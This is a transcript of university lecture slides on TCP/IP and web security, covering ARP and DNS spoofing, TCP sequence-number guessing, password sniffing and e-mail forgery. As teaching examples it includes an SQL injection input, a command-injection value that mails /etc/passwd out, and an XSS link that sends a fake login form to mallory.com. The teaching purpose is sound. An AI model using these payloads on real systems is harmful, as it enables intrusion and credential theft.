SlideShare a Scribd company logo
1 of 42
Pertemuan - 12
Introduction to Security

Jaringan Komputer
Teknik Informatika
Universitas Yudharta Pasuruan
2012

© Levente Buttyån

MOCHAMAD SIRODJUDIN, S.Kom, MM
www.sirodjudin.com
Outline
 TCP/IP networking overview
 protocols and known vulnerabilities
–
–
–
–
–
–

ARP / ARP spoofing
IP / eavesdropping, alteration, traffic analysis, etc.
TCP / SYN attack
Telnet, FTP / password sniffing
SMTP / e-mail forgery, eavesdropping, alteration
DNS / DNS spoofing

 more known security problems
–
–
–
–

Web forms, cookies, and CGI scripts
mobile code (Java scripts, Java applets, and ActiveX controls)
denial of service (DoS)
exploiting bugs in software (buffer overflow problems)

 outline of the course
© Levente Buttyån

2
TCP/IP layering
HTTP

application




FTP

DNS

SMTP




SNMP

transport
UDP

TCP/IP networking overview

TCP

network
IGMP

ICMP

IP

ARP

hardware
interface
media

© Levente Buttyån

link
RARP

3
An example
end system

end system

HTTP
client

HTTP
server

HTTP

TCP

TCP

TCP

TCP/IP networking overview

router

IP
Ethernet
driver

IP

Ethernet
protocol

Ethernet

© Levente Buttyån

IP

IP
Ethernet
driver

token ring
driver

token
ring
protocol

IP
token ring
driver

token ring

4
Encapsulation
user data

HTTP
client
HTTP hdr

TCP
TCP hdr

TCP/IP networking overview

IP
IP hdr

Ethernet
driver
Eth. hdr

tr.

Ethernet

© Levente Buttyån

5
Demultiplexing
HTTP
FTP




DNS
SNMP

SMTP

TCP

TCP/IP networking overview




UDP

IGMP
ICMP
IP

demuxing based on
the port number
in the TCP or UDP
header

demuxing based on the
protocol id in the IP header

RARP
ARP
Ethernet
driver
© Levente Buttyån

demuxing based on frame type
in the Ethernet header

6
Names and addresses
 IP addresses

TCP/IP networking overview

– every interface has a unique IP address
– 32 bits long, usually given in dotted decimal notation
– 5 classes:
‱
‱
‱
‱
‱

class A: “0” + 7 bits net ID + 24 bits host ID
class B: “10” + 14 bits net ID + 16 bits host ID
class C: “110” + 21 bits net ID + 8 bits host ID
class D: “1110” + 28 bits multicast group ID
class E: starts with “11110”, reserved for future use

– subnet addressing (CIDR - classless Internet domain routing)
‱ host ID portion is divided into a subnet ID and a host ID
‱ e.g., class B address: “10” + 14 bit net ID + 8 bit subnet ID + 8 bit host ID
hierarchical addressing

© Levente Buttyån

7
Names and addresses
 hardware address (MAC addresses)

TCP/IP networking overview

–
–
–
–

every interface has a unique and fixed hardware address too
it is used by the data link layer
in case of Ethernet, it is 48 bits long
mapping between IP addresses and MAC addresses are done by ARP

 host names
– human readable, hierarchical names, such as www.hit.bme.hu
– every host may have several names
– mapping between names and IP addresses is done by the Domain Name
System (DNS)

© Levente Buttyån

8
ARP – Address Resolution Protocol
 mapping from IP addresses to MAC addresses
Request
.1

08:00:20:03:F6:42
.2

.3

.4

00:00:C0:C2:9B:26
.5

140.252.13

Protocols and vulnerabilities

arp req | target IP: 140.252.13.5 | target eth: ?

Reply
.1

08:00:20:03:F6:42
.2

.3

.4

00:00:C0:C2:9B:26
.5

140.252.13
arp rep | sender IP: 140.252.13.5 | sender eth: 00:00:C0:C2:9B:26

© Levente Buttyån

9
ARP spoofing
 an ARP request can be responded by another host
Request
.1

08:00:20:03:F6:42
.2

.3

.4

00:00:C0:C2:9B:26
.5

140.252.13

Protocols and vulnerabilities

arp req | target IP: 140.252.13.5 | target eth: ?

Reply
.1

08:00:20:03:F6:42
.2

.3

00:34:CD:C2:9F:A0 00:00:C0:C2:9B:26
.4
.5

140.252.13
arp rep | sender IP: 140.252.13.5 | sender eth: 00:34:CD:C2:9F:A0

© Levente Buttyån

10
Protocols and vulnerabilities

IP – Internet Protocol
 provides an unreliable, connectionless datagram delivery
service to the upper layers
 its main function is routing
 it is implemented in both end systems and intermediate
systems (routers)
 routers maintain routing tables that define the next hop router
towards a given destination (host or network)
 IP routing uses the routing table and the information in the IP
header (e.g., the destination IP address) to route a packet

© Levente Buttyån

11
IP security problems
 user data in IP packets is not protected in any way
– anyone who has access to a router can read and modify the user data in the
packets

 IP packets are not authenticated
– it is fairly easy to generate an IP packet with an arbitrary source IP address

Protocols and vulnerabilities

 traffic analysis
– even if user data was encrypted, one could easily determine who is
communicating with whom by just observing the addressing information in the
IP headers

 information exchanged between routers to maintain their routing tables is
not authenticated
–
–
–
–

correct routing table updates can be modified or fake ones can be disseminated
this may screw up routing completely leading to loops or partitions
it may also facilitate eavesdropping, modification, and monitoring of traffic
it may cause congestion of links or routers (i.e., denial of service)

© Levente Buttyån

12
TCP – Transmission Control Protocol
 provides a connection oriented, reliable, byte stream service to
the upper layers
 connection oriented:

Protocols and vulnerabilities

– connection establishment phase prior to data transfer
– state information (sequence numbers, window size, etc.) is maintained
at both ends

 reliable:
– positive acknowledgement scheme (unacknowledged bytes are
retransmitted after a timeout)
– checksum on both header and data
– reordering of segments that are out of order
– detection of duplicate segments
– flow control (sliding window mechanism)

© Levente Buttyån

13
TCP connection establishment
3 way handshake
client

SYN = ISNC
SYN = ISNS, ACK(ISNC)

server
ISN – Initial Sequence Number

ACK(ISNS)

Protocols and vulnerabilities

data transfer

– sequence numbers are 32 bits long
– the sequence number in a data segment identifies the first byte in the
segment
– sequence numbers are initialized with a “random” value during
connection setup
– the RFC suggests that the ISN is incremented by one at least every 4 ms

© Levente Buttyån

14
TCP SYN attack
 in Berkeley implementations, the ISN is incremented by a constant amount
(64000)
– once per 0.5 second, and
– each time a connection is initiated

Protocols and vulnerabilities

 it is not hopeless to guess the next ISN to be used by a server
 an attacker can impersonate a trusted host (e.g., in case of r commands,
authentication is based on source IP address solely)
attacker

SYN = ISNX, SRC_IP = T

server

trusted host (T)

SYN = ISNS, ACK(ISNX)
ACK(ISNS), SRC_IP = T
SRC_IP = T, nasty_data

© Levente Buttyån

15
TCP SYN attack – How to guess ISNS?
attacker

server

Protocols and vulnerabilities

Dt

–
–
–
–
–
–

ISNS‟ depends on ISNS and Dt
Dt can be estimated from the round trip time
assume Dt can be estimated with 10 ms precision
the attacker has an uncertainty of 1280 in the possible value for ISNS‟
assume each trial takes 5 s
the attacker has a reasonable likelihood of succeeding in 6400 s and a
near-certainty within one day

© Levente Buttyån

16
FTP – File Transfer Protocol
client
user
interface
user
server

Protocols and vulnerabilities

protocol
interpreter

data
transfer
function

file system

© Levente Buttyån

control connection
(FTP commands and replies)

protocol
interpreter

data connection

data
transfer
function

file system

17
FTP cont‟d
 typical FTP commands:
–
–
–
–
–

RETR filename – retrieve (get) a file from the server
STOR filename – store (put) a file on the server
TYPE type – specify file type (e.g., A for ASCII)
USER username – username on server
PASS password – password on server

 FTP is a text (ASCII) based protocol
server

Protocols and vulnerabilities

client
% ftp ftp.epfl.ch

<TCP connection setup to port 21 of ftp.epfl.ch>
“220 ftp.epfl.ch FTP server (version 5.60) ready.”

Connected to ftp.epfl.ch.
Name: buttyan

“USER buttyan”
“331 Password required for user buttyan.”

Password: kiskacsa

“PASS kiskacsa”
“230 User buttyan logged in.”



© Levente Buttyån

18
Telnet

Protocols and vulnerabilities

 provides remote login service to users
 works between hosts that use different operating systems
 uses option negotiation between client and server to determine
what features are supported by both ends

Telnet client
kernel

Telnet server

login shell

kernel

terminal
driver

TCP/IP

TCP/IP

pseudoterminal
driver

TCP connection
user
© Levente Buttyån

19
Telnet cont‟d
 Telnet session example (“character at a time” mode)
server

client
% telnet ahost.epfl.ch
Connected to ahost.epfl.ch.
Escape character is „^]‟.

<TCP connection setup to port 23 of ahost.epfl.ch>

<Telnet option negotiation>
“UNIX(r) System V Release 4.0”
“Login:”

Protocols and vulnerabilities

Login: b

“b”

Login: bu

“u”



Login: buttyan

“n”
“Password:”

Password: k

“k”



Password: kiskacsa

“a”

<OS greetings and shell prompt, e.g., “%”>
© Levente Buttyån




20
SMTP – Simple Mail Transfer Protocol
sending host
user
agent

mails to
be sent

user
local
MTA

SMTP

relay
MTA

TCP connection SMTP

Protocols and vulnerabilities

TCP port 25

relay
MTA
SMTP

receiving host
local
MTA

user
agent
user
© Levente Buttyån

SMTP

relay
MTA

user
mailbox
21
SMTP cont‟d
 SMTP is used by MTAs to talk to each other
 SMTP is a text (ASCII) based protocol
sending MTA (rivest.hit.bme.hu)

receiving MTA (shamir.hit.bme.hu)
<TCP connection establishment to port 25>
“HELO rivest.hit.bme.hu.”

“250 shamir.hit.bme.hu Hello rivest.hit.bme.hu., pleased to meet you”

Protocols and vulnerabilities

“MAIL from: buttyan@rivest.hit.bme.hu”
“250 buttyan@rivest.hit.bme.hu... Sender ok”
“RCPT to: hubaux@lca.epfl.ch”
“250 hubaux@lca.epfl.ch
 Recipient ok”
“DATA”
“354 Enter mail, end with a “.” on a line by itself”
<message to be sent>
.
“250 Mail accepted”
“QUIT”
“221 shamir.hit.bme.hu delivering mail”
© Levente Buttyån

22
SMTP security problems
 SMTP does not provide any protection of e-mail messages
– messages can be read and modified by any of the MTAs involved
– fake messages can easily be generated (e-mail forgery)

Protocols and vulnerabilities

 Example:
% telnet frogstar.hit.bme.hu 25
Trying...
Connected to frogstar.hit.bme.hu.
Escape character is ‘^[’.
220 frogstar.hit.bme.hu ESMTP Sendmail 8.11.6/8.11.6;
Mon, 10 Feb 2003 14:23:21 +0100
helo abcd.bme.hu
250 frogstar.hit.bme.hu Hello [152.66.249.32], pleased to meet you
mail from: bill.gates@microsoft.com
250 2.1.0 bill.gates@microsoft.com... Sender ok
rcpt to: buttyan@ebizlab.hit.bme.hu
250 2.1.5 buttyan@ebizlab.hit.bme.hu... Recipient ok
data
354 Enter mail, end with "." on a line by itself
Your fake message goes here.
.
250 2.0.0 h1ADO5e21330 Message accepted for delivery
quit
221 frogstar.hit.bme.hu closing connection
Connection closed by foreign host.
%
© Levente Buttyån

23
Protocols and vulnerabilities

Be careful, though!
Return-Path: <bill.gates@microsoft.com>
Received: from frogstar.hit.bme.hu (root@frogstar.hit.bme.hu [152.66.248.44])
by shamir.ebizlab.hit.bme.hu (8.12.7/8.12.7/Debian-2)
with ESMTP id h1ADSsxG022719
for <buttyan@ebizlab.hit.bme.hu>; Mon, 10 Feb 2003 14:28:54 +0100
Received: from abcd.bme.hu ([152.66.249.32])
by frogstar.hit.bme.hu (8.11.6/8.11.6) with SMTP id h1ADO5e21330
for buttyan@ebizlab.hit.bme.hu; Mon, 10 Feb 2003 14:25:41 +0100
Date: Mon, 10 Feb 2003 14:25:41 +0100
From: bill.gates@microsoft.com
Message-Id: <200302101325.h1ADO5e21330@frogstar.hit.bme.hu>
To: undisclosed-recipients:;
X-Virus-Scanned: by amavis-dc
Status:
Your fake message goes here.

© Levente Buttyån

24
DNS – Domain Name System

Protocols and vulnerabilities

 The DNS is a distributed database that provides mapping
between hostnames and IP addresses
 the DNS name space is hierarchical
– top level domains: com, edu, gov, int, mil, net, org, ae, 
, hu, 
 zw
– top level domains may contain second level domains
e.g., bme within hu, epfl within ch, 

– second level domains may contain third level domains, etc.

 each domain has name servers
– usually (not always) a name server knows the IP address of the top level
name servers
– if a domain contains sub-domains, then the name server knows the IP
address of the sub-domain name servers
– when a new host is added to a domain, the administrator adds the
(hostname, IP address) mapping to the database of the local name
server
© Levente Buttyån

25
DNS cont‟d
frogstar.hit.bme.hu = ?
application

152.66.248.44

local
name srv

frogstar.hit.bme.hu = ?
IP of ns in hu

top level
name srv

name srv
in hu

Protocols and vulnerabilities

name srv
in bme.hu

name srv
in hit.bme.hu

– a single DNS reply may include several (hostname, IP address)
mappings (Resource Records)
– received information is cached by the name server

© Levente Buttyån

26
DNS spoofing
 the cache of a DNS name server is poisoned with false
information
 how to do it?

Protocols and vulnerabilities

– assume that the attacker wants www.anything.hu to map to his own IP
address 152.66.249.32
– approach 1:
‱ attacker submits a DNS query “www.anything.hu=?” to ns.victim.hu
‱ a bit later it forges a DNS reply “www.anything.hu=152.66.249.32”
‱ UDP makes forging easier but the attacker must still predict the query ID

– approach 2 (attacker has access to ns.attacker.hu):
‱ the attacker modifies its local name server such that it responds a query
“www.attacker.hu=?” with “www.anything.hu=152.66.249.32”
‱ the attacker then submits a query “www.attacker.hu=?” to ns.victim.hu
‱ ns.victim.hu sends the query “www.attacker.hu=?” to ns.attacker.hu
‱ ns.attacker.hu responds with “www.anything.hu=152.66.249.32”
© Levente Buttyån

27
Web security – Browser side risks
 obtaining a valid browser
– IE usually comes with the OS
– Netscape can be obtained from web sites
– How can you be sure that you are downloading a genuine copy?
(remember DNS spoofing)
– a fake browser can look like a genuine one, but it can

Web security problems

‱ obtain and send passwords typed in by the user
‱ downgrade browser security (e.g., reduce key length used in SSL)
‱ 


 web forms
– used to send data from the user to the server (e.g., online applications,
queries to a database, etc.)
– if pure HTTP is used, then the data is sent in clear
– sensitive information can be eavesdropped and/or modified
© Levente Buttyån

28
Browser side risks cont‟d
 helper applications
– the browser cannot handle all kind of downloaded data
– it invokes an external program (the helper) on the user‟s machine with
the downloaded data as parameter
– e.g., to display a PostScript file, it may pass it to GhostView
– downloaded content can be dangerous (e.g., MS Word and Excel files
may contain macro viruses)

Web security problems

 mobile code
– Java applets
‱ normally run within a controlled environment (sandbox)
‱ access to local resources is strictly controlled by a security manager
‱ however, an applet may escape from the sandbox due to some bugs in the
implementation of the Java Virtual Machine
‱ several such bugs have been discovered, reported, and fixed
‱ what guarantees that there‟s no more?
© Levente Buttyån

29
Browser side risks cont‟d
 mobile code (cont‟d)
– ActiveX controls
‱ a Microsoft approach to mobile code
‱ ActiveX controls are executables that run directly on the machine (there‟s
no sandbox)
‱ ActiveX controls can be signed and declared safe by their creators
‱ but an ActiveX control declared safe may turn out to be dangerous

Web security problems

– Compaq signed a control safe which allowed for remote management of
servers
– Microsoft signed a control which could write arbitrary file on the hard disk (it
was exploited by a virus Kak.Worm)

– JavaScript != Java applet
‱ scripts are interpreted by the browser itself
‱ not as powerful as Java (e.g., many attacks require that the user clicks on a
button to activate the malicious code)
‱ successful attacks reported include history tracking, stealing files, helping
Java applets to bypass firewalls, etc.

© Levente Buttyån

30
Browser side risks cont‟d
 cookies

Web security problems

– a cookie is a (name, value) pair
– cookies are set by web servers and stored by web browsers
– a cookie set by a server is sent back to the server when the browser
visits the server again
– used to create “HTTP sessions” (session state information is stored in
cookies)
– example:
client

server

get index.html
content of index.html + set-cookie: sessionID=123456789
get nextlink.html + cookie: sessionID=123456789



© Levente Buttyån

31
Browser side risks cont‟d
 cookies (cont‟d)
– if cookies are sent in clear, then they can be eavesdropped and used to hijack
an “HTTP session”
– cookies can be used to track what sites the user visits (can lead to serious
privacy violation!)

Web security problems

‱ many sites use third party advertisements
‱ the third party can set a cookie that identifies the user
‱ this cookie is sent to the third party each time an ad is downloaded by the user‟s
browser along with the address of the page that contains the link to the ad (the
“referrer” field of the HTTP header contains this address)
whatever.com
index.html

browser
get ad_server.asp +
referrer=“whatever.com/index.html” +
cookie: user=123456789
© Levente Buttyån

<html>


<img src=“http://thirdparty.com/ad_server.asp”>


</html>

thirdparty.com

32
Browser side risks cont‟d
 http://www.musicvision.com/network_privacy_policy.html

Web security problems

Third Party Advertising
We use Maxworldwide and other third-party advertising companies to serve ads
when you visit our Web site. These companies may use information (not including
your name, address, email address or telephone number) about your visits to this
and other Web sites in order to provide advertisements on this site and other sites
about goods and services that may be of interest to you. If you would like more
information about this practice and to know your choices about not having this
information used by these companies, please click here
Third Party Cookies
In the course of serving advertisements to this site, our third-party advertiser may
place or recognize a unique "cookie" on your browser.

© Levente Buttyån

33
Web security – Server side risks
 interactive web sites are based on forms and scripts

Web security problems

– forms are written in html
– the user fills the form and clicks on a button to submit it
– this creates a request to the server that contains the data typed in by
the user
– the request launches a script on the server that processes the data
supplied by the user (may return a page that is created using the
supplied data)

 unexpected user input may have unexpected effects
– special characters
– too much data (may cause buffer overflow)

 at best, the server crashes
 at worst, the attacker gains control over the server
© Levente Buttyån

34
Server side risks cont‟d
 an example: password based user authentication
– assume the following server side script is used to check the supplied
username and password:
query$ = „SELECT name, pass FROM database WHERE name = “ ‟ + name$ + „ ” AND
pass = “ ‟ + pass$ + „ ” ‟
Result = SQLquery(query$)
if Result <> 0 then OK

– with name$ = buttyan and pass$ = kiskacsa

Web security problems

SELECT name, pass FROM database WHERE name = “buttyan” AND pass = “kiskacsa”

– with name$ = buttyan” OR TRUE OR name = “ and pass$ = kiskacsa
SELECT name, pass FROM database WHERE name = “buttyan” OR TRUE OR name = “”
AND pass = “kiskacsa”

© Levente Buttyån

35
Server side risks cont‟d
 another example: the user can type her e-mail address in a
form and the server sends her the latest public company report
– assume the following perl script is used on the server
system(“sendmail $address < report.doc”);

– with $address = buttyan@hit.bme.hu
system(“sendmail buttyan@hit.bme.hu < report.doc”);

Web security problems

– with $address = buttyan@hit.bme.hu < /etc/passwd | sendmail
buttyan@hit.bme.hu
system(“sendmail buttyan@hit.bme.hu < /etc/passwd | sendmail
buttyan@hit.bme.hu < report.doc”);

© Levente Buttyån

36
Server side risks cont‟d
 Buffer overflow attacks
– if the program doesn‟t verify that the supplied data fits in the allocated
space, then it may overwrite some parts of the memory, which may
contain data, instructions, or addresses
– by carefully analyzing the program structure one can provide machine
code as part of the supplied data that will be executed by the server
– many attacks use buffer overflow bugs (e.g., infamous Internet Worm by
Morris used a buffer overflow bug in the sendmail program)

Web security problems

 Format string attack
– printf(“%s”, str); -- correct.
– printf(str); -- will compile, but dangerous!
‱ str will be interpreted as a format string

© Levente Buttyån

37
Cross site scripting
 the attacker arranges that the victim receives a malicious
script from a trusted server
 example:

Web security problems

– Mallory places the script in the “guest book” of Bob
– Alice visits the “guest book” of Bob
– her browser downloads and runs Mallory‟s script

© Levente Buttyån

38
CSS cont‟d
 another example
– when requesting a non-existent file abcd.html from some web servers,
they return error messages like:
“The requested file abcd.html cannot be found on the server.”

Web security problems

– Mallory can place the following link on a page:
< a href=“http://trusted.server.com/is protected. The server needs you to
login.<br><form action=&#34;http://mallory.com/cgiscript.cgi&#34;
method=&#34;post&#34;>Username: <input type=&#34;text&#34;
name=&#34;name&#34;><br>Password: <input type=&#34;password&#34;
name=&#34;pass&#34;><br><input type=&#34;submit&#34;
value=&#34;Login&#34;></form><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>”>

– what will happen?
‱ Alice clicks on the link
‱ HTTP request is sent to trusted.server.com
‱ the server returns the usual error page, but it will look like a login window...

© Levente Buttyån

39
CSS cont‟d
The requested file is protected. The server needs you to log in.

Username:
Password:

Web security problems

Login

browser window

cannot be found on the server.

© Levente Buttyån

40
Conclusion
 there are many more vulnerabilities and attacks
Auto
Coordinated

© 2002 by Carnegie Mellon University
http://www.cert.org/archive/ppt/cyberterror.ppt

Cross site scripting
“stealth” / advanced
scanning techniques

High

packet spoofing
sniffers

Intruder
Knowledge

sweepers

Tools

Staged
distributed
www attack tools
attacks
automated probes/scans

denial of
service

GUI

back doors
disabling audits

network mgmt. diagnostics
hijacking
burglaries sessions
exploiting known vulnerabilities

Attack
Sophistication

password cracking
self-replicating code

Intruders

password guessing

Low
1980

1985

1990

1995

2000

 some of these cannot be prevented by technical means, but only with
careful procedures and education of people
 this course will focus on technical countermeasures
© Levente Buttyån

41
Course outline














brief introduction to cryptography
e-mail security: PGP, S/MIME
secure remote access: SSH
the Secure Socket Layer (SSL)
network layer security: IPSec (AH, ESP, IKE)
link layer security: L2TP
e-commerce security: SET, e-cash, micropayments
privacy protection: Onion routing, Crowds
Java security
DNS security
firewalls and intrusion detection systems
Wi-Fi security (IEEE 802.11 wireless LAN)
peer-to-peer security

© Levente Buttyån

42

More Related Content

What's hot

Telnet presentation
Telnet presentationTelnet presentation
Telnet presentationtravel_affair
 
Sockets in unix
Sockets in unixSockets in unix
Sockets in unixswtjerin4u
 
TCP IP
TCP IPTCP IP
TCP IPhivasu
 
Final networks lab manual
Final networks lab manualFinal networks lab manual
Final networks lab manualJaya Prasanna
 
20 common port numbers and their purposes
20 common port numbers and their purposes 20 common port numbers and their purposes
20 common port numbers and their purposes salamassh
 
security problems in the tcp/ip protocol suite
security problems in the tcp/ip protocol suitesecurity problems in the tcp/ip protocol suite
security problems in the tcp/ip protocol suiteYash Kotak
 
Meeting 5.1 : telnet
Meeting 5.1 : telnetMeeting 5.1 : telnet
Meeting 5.1 : telnetSyaiful Ahdan
 
TCP - Transmission Control Protocol
TCP - Transmission Control ProtocolTCP - Transmission Control Protocol
TCP - Transmission Control ProtocolPeter R. Egli
 
Firewalls
FirewallsFirewalls
Firewallshemantag
 
Computer Network - Telnet and Gopher
Computer Network -  Telnet and GopherComputer Network -  Telnet and Gopher
Computer Network - Telnet and GopherManoj Kumar
 
Chap 19 ftp & tftp
Chap 19 ftp & tftpChap 19 ftp & tftp
Chap 19 ftp & tftpNoctorous Jamal
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocolsKailash Kumar
 
Np unit iii
Np unit iiiNp unit iii
Np unit iiivamsitricks
 
Ch02 TCP/IP Concepts Review
Ch02 TCP/IP Concepts ReviewCh02 TCP/IP Concepts Review
Ch02 TCP/IP Concepts Reviewphanleson
 
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sipTlc 004 - take a sip of sip
Tlc 004 - take a sip of sipAnna Volynkina
 
Transport Layer Port or TCP/IP & UDP Port
Transport Layer Port or TCP/IP & UDP PortTransport Layer Port or TCP/IP & UDP Port
Transport Layer Port or TCP/IP & UDP PortNetwax Lab
 
Features of tcp (part 2) .68
Features of tcp  (part 2) .68Features of tcp  (part 2) .68
Features of tcp (part 2) .68myrajendra
 
Np unit iv ii
Np unit iv iiNp unit iv ii
Np unit iv iivamsitricks
 

What's hot (20)

Telnet presentation
Telnet presentationTelnet presentation
Telnet presentation
 
Sockets in unix
Sockets in unixSockets in unix
Sockets in unix
 
TCP IP
TCP IPTCP IP
TCP IP
 
Final networks lab manual
Final networks lab manualFinal networks lab manual
Final networks lab manual
 
20 common port numbers and their purposes
20 common port numbers and their purposes 20 common port numbers and their purposes
20 common port numbers and their purposes
 
security problems in the tcp/ip protocol suite
security problems in the tcp/ip protocol suitesecurity problems in the tcp/ip protocol suite
security problems in the tcp/ip protocol suite
 
Meeting 5.1 : telnet
Meeting 5.1 : telnetMeeting 5.1 : telnet
Meeting 5.1 : telnet
 
TCP - Transmission Control Protocol
TCP - Transmission Control ProtocolTCP - Transmission Control Protocol
TCP - Transmission Control Protocol
 
Firewalls
FirewallsFirewalls
Firewalls
 
Computer Network - Telnet and Gopher
Computer Network -  Telnet and GopherComputer Network -  Telnet and Gopher
Computer Network - Telnet and Gopher
 
Chap 19 ftp & tftp
Chap 19 ftp & tftpChap 19 ftp & tftp
Chap 19 ftp & tftp
 
Ports and protocols
Ports and protocolsPorts and protocols
Ports and protocols
 
Np unit iii
Np unit iiiNp unit iii
Np unit iii
 
Ch02 TCP/IP Concepts Review
Ch02 TCP/IP Concepts ReviewCh02 TCP/IP Concepts Review
Ch02 TCP/IP Concepts Review
 
Tlc 004 - take a sip of sip
Tlc 004 - take a sip of sipTlc 004 - take a sip of sip
Tlc 004 - take a sip of sip
 
Transport Layer Port or TCP/IP & UDP Port
Transport Layer Port or TCP/IP & UDP PortTransport Layer Port or TCP/IP & UDP Port
Transport Layer Port or TCP/IP & UDP Port
 
Np unit2
Np unit2Np unit2
Np unit2
 
Features of tcp (part 2) .68
Features of tcp  (part 2) .68Features of tcp  (part 2) .68
Features of tcp (part 2) .68
 
TCP/IP(networking)
TCP/IP(networking)TCP/IP(networking)
TCP/IP(networking)
 
Np unit iv ii
Np unit iv iiNp unit iv ii
Np unit iv ii
 

Similar to security

Application Layer and Socket Programming
Application Layer and Socket ProgrammingApplication Layer and Socket Programming
Application Layer and Socket Programmingelliando dias
 
Training Day Slides
Training Day SlidesTraining Day Slides
Training Day Slidesadam_merritt
 
16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)Jeff Green
 
More on Tcp/Ip
More on Tcp/IpMore on Tcp/Ip
More on Tcp/IpRakhi Saxena
 
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 FinalExploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Finalmasoodnt10
 
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
TakeDownCon Rocket City: Bending and Twisting Networks by Paul CogginTakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
TakeDownCon Rocket City: Bending and Twisting Networks by Paul CogginEC-Council
 
Unit 8 Java
Unit 8 JavaUnit 8 Java
Unit 8 Javaarnold 7490
 
Session 2 Tp 2
Session 2 Tp 2Session 2 Tp 2
Session 2 Tp 2githe26200
 
socket programming
 socket programming  socket programming
socket programming prashantzagade
 
socket programming
socket programming socket programming
socket programming prashantzagade
 
Zdalna komunikacja sieciowa - zagadnienia sieciowe
Zdalna komunikacja sieciowa - zagadnienia sieciowe Zdalna komunikacja sieciowa - zagadnienia sieciowe
Zdalna komunikacja sieciowa - zagadnienia sieciowe Agnieszka Kuba
 
CCNA RS_NB - Chapter 5
CCNA RS_NB - Chapter 5CCNA RS_NB - Chapter 5
CCNA RS_NB - Chapter 5Irsandi Hasan
 
Tcp
TcpTcp
Tcpgiaolvq
 
Internet protocol (ip) ppt
Internet protocol (ip) pptInternet protocol (ip) ppt
Internet protocol (ip) pptDulith Kasun
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2T. J. Saotome
 
Socket Programming TCP:IP PPT.pdf
Socket Programming TCP:IP PPT.pdfSocket Programming TCP:IP PPT.pdf
Socket Programming TCP:IP PPT.pdfPraveenKumar187040
 
14 network tools
14 network tools14 network tools
14 network toolsShay Cohen
 

Similar to security (20)

Firewall
FirewallFirewall
Firewall
 
Application Layer and Socket Programming
Application Layer and Socket ProgrammingApplication Layer and Socket Programming
Application Layer and Socket Programming
 
Training Day Slides
Training Day SlidesTraining Day Slides
Training Day Slides
 
16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)16.) layer 3 (basic tcp ip routing)
16.) layer 3 (basic tcp ip routing)
 
More on Tcp/Ip
More on Tcp/IpMore on Tcp/Ip
More on Tcp/Ip
 
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 FinalExploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
Exploiting Network Protocols To Exhaust Bandwidth Links 2008 Final
 
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
TakeDownCon Rocket City: Bending and Twisting Networks by Paul CogginTakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
TakeDownCon Rocket City: Bending and Twisting Networks by Paul Coggin
 
Unit 8 Java
Unit 8 JavaUnit 8 Java
Unit 8 Java
 
Session 2 Tp 2
Session 2 Tp 2Session 2 Tp 2
Session 2 Tp 2
 
socket programming
 socket programming  socket programming
socket programming
 
socket programming
socket programming socket programming
socket programming
 
TCP/IP Basics
TCP/IP BasicsTCP/IP Basics
TCP/IP Basics
 
Zdalna komunikacja sieciowa - zagadnienia sieciowe
Zdalna komunikacja sieciowa - zagadnienia sieciowe Zdalna komunikacja sieciowa - zagadnienia sieciowe
Zdalna komunikacja sieciowa - zagadnienia sieciowe
 
CCNA RS_NB - Chapter 5
CCNA RS_NB - Chapter 5CCNA RS_NB - Chapter 5
CCNA RS_NB - Chapter 5
 
Tcp
TcpTcp
Tcp
 
Internet protocol (ip) ppt
Internet protocol (ip) pptInternet protocol (ip) ppt
Internet protocol (ip) ppt
 
class12_Networking2
class12_Networking2class12_Networking2
class12_Networking2
 
IP Utilites
IP UtilitesIP Utilites
IP Utilites
 
Socket Programming TCP:IP PPT.pdf
Socket Programming TCP:IP PPT.pdfSocket Programming TCP:IP PPT.pdf
Socket Programming TCP:IP PPT.pdf
 
14 network tools
14 network tools14 network tools
14 network tools
 

More from ahmad amiruddin

enkripsi and authentication
enkripsi and authenticationenkripsi and authentication
enkripsi and authenticationahmad amiruddin
 
transport layer protocol
transport layer protocoltransport layer protocol
transport layer protocolahmad amiruddin
 
penerapan ip address subnet
penerapan ip address subnetpenerapan ip address subnet
penerapan ip address subnetahmad amiruddin
 
ip address and subnet address
ip address and subnet addressip address and subnet address
ip address and subnet addressahmad amiruddin
 
internet layer protokol
internet layer protokolinternet layer protokol
internet layer protokolahmad amiruddin
 
konsep dasar jaringan komputer
konsep dasar jaringan komputerkonsep dasar jaringan komputer
konsep dasar jaringan komputerahmad amiruddin
 
membuat desain sistem keamanan jaringan
membuat desain sistem keamanan jaringanmembuat desain sistem keamanan jaringan
membuat desain sistem keamanan jaringanahmad amiruddin
 
mengadministrasi server dalam jaringan
mengadministrasi server dalam jaringanmengadministrasi server dalam jaringan
mengadministrasi server dalam jaringanahmad amiruddin
 

More from ahmad amiruddin (15)

firewall
firewallfirewall
firewall
 
enkripsi and authentication
enkripsi and authenticationenkripsi and authentication
enkripsi and authentication
 
application layer
application layerapplication layer
application layer
 
transport layer protocol
transport layer protocoltransport layer protocol
transport layer protocol
 
protokol routing
protokol routingprotokol routing
protokol routing
 
routing
routingrouting
routing
 
penerapan ip address subnet
penerapan ip address subnetpenerapan ip address subnet
penerapan ip address subnet
 
manajemen ip
manajemen ipmanajemen ip
manajemen ip
 
ip address and subnet address
ip address and subnet addressip address and subnet address
ip address and subnet address
 
internet layer protokol
internet layer protokolinternet layer protokol
internet layer protokol
 
data link layer
data link layerdata link layer
data link layer
 
referensi osi
referensi osireferensi osi
referensi osi
 
konsep dasar jaringan komputer
konsep dasar jaringan komputerkonsep dasar jaringan komputer
konsep dasar jaringan komputer
 
membuat desain sistem keamanan jaringan
